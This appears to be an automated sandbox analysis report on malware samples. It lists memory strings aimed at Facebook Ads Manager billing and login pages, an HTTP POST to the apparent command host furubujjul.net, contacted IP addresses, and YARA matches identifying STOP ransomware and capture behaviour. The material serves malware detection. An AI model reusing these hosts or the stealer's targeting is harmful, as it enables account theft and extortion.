                Source: 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: e</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_US&quot;, &quot;https:\/\/ar-ar.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Arabic"> equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535997574.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ext=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1 equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.541117743.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543170336.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534923998.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.561267156.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.560758101.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559528158.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.508467301.0000000000661000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535497910.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.541014339.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.563225002.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566103544.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.539332491.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.542287359.000000000065B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537371018.0000000000662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/accos-wa5 equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.541117743.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543170336.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534923998.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.561267156.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.560758101.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559528158.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535497910.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.541014339.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.563225002.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566103544.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.539332491.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.542287359.000000000065B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537371018.0000000000662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing<- equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.541117743.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543170336.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534923998.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.561267156.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.560758101.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559528158.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535497910.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.541014339.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.563225002.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566103544.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.539332491.0000000000662000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.542287359.000000000065B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537371018.0000000000662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingD equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingf* equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ol</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_US&quot;, &quot;https:\/\/tr-tr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">T equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.535321425.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.548144466.000000000241B000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.530031259.00000000005F6000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.531748027.0000000000646000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manager\/account_settings\/account_billing");});</script> equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.547934832.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rXhp?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing_used,form_data,display_name,icon_url,federation_url,skip_zh equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.537958292.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535904111.00000000023A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;https:\/\/sq-al.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Albanian">Shqip</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_US&quot;, &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espa equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.534980843.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.547934832.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566738501.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535997574.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.536067115.00000000023D2000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.547702633.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.536124394.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.534965935.00000000023D2000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.522481336.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.522569046.00000000023E1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543232930.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.534980843.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.540505674.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.547934832.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.538423863.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566738501.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.536124394.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.522569046.00000000023E1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.543232930.00000000023DD000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.559756913.00000000023DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com38 equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com< equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.546733790.00000000023EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com@? equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.537557430.000000000237A000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.532199392.0000000002376000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comB^a5! equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.537557430.000000000237A000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.532199392.0000000002376000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comHTEP equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comRCHAR equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comTEGER equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comY equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comcs| equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.532199392.0000000002376000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comhtep equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.coms equals www.facebook.com (Facebook)
                Source: 8C19.exe, 0000000A.00000003.532199392.0000000002376000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535596843.000000000237B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmedenoe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: furubujjul.net
                Source: unknownHTTPS traffic detected: 185.220.204.62:443 -> 192.168.2.5:49694 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49695 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.5:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.144.15.231:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.144.15.231:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 31.13.92.36:443 -> 192.168.2.5:49718 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 5.2.thduhcf.700e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.710e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.3.thduhcf.710000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.file.exe.720000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.thduhcf.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.549038342.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: file.exe, 00000000.00000002.431305052.00000000008BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: Yara matchFile source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.6246.exe.22615a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.6246.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.6246.exe.400000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 6246.exe PID: 5608, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 6246.exe PID: 1420, type: MEMORYSTR

                System Summary

                barindex
                Source: 8.0.6246.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.2.6246.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 4.2.6246.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 8.0.6246.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
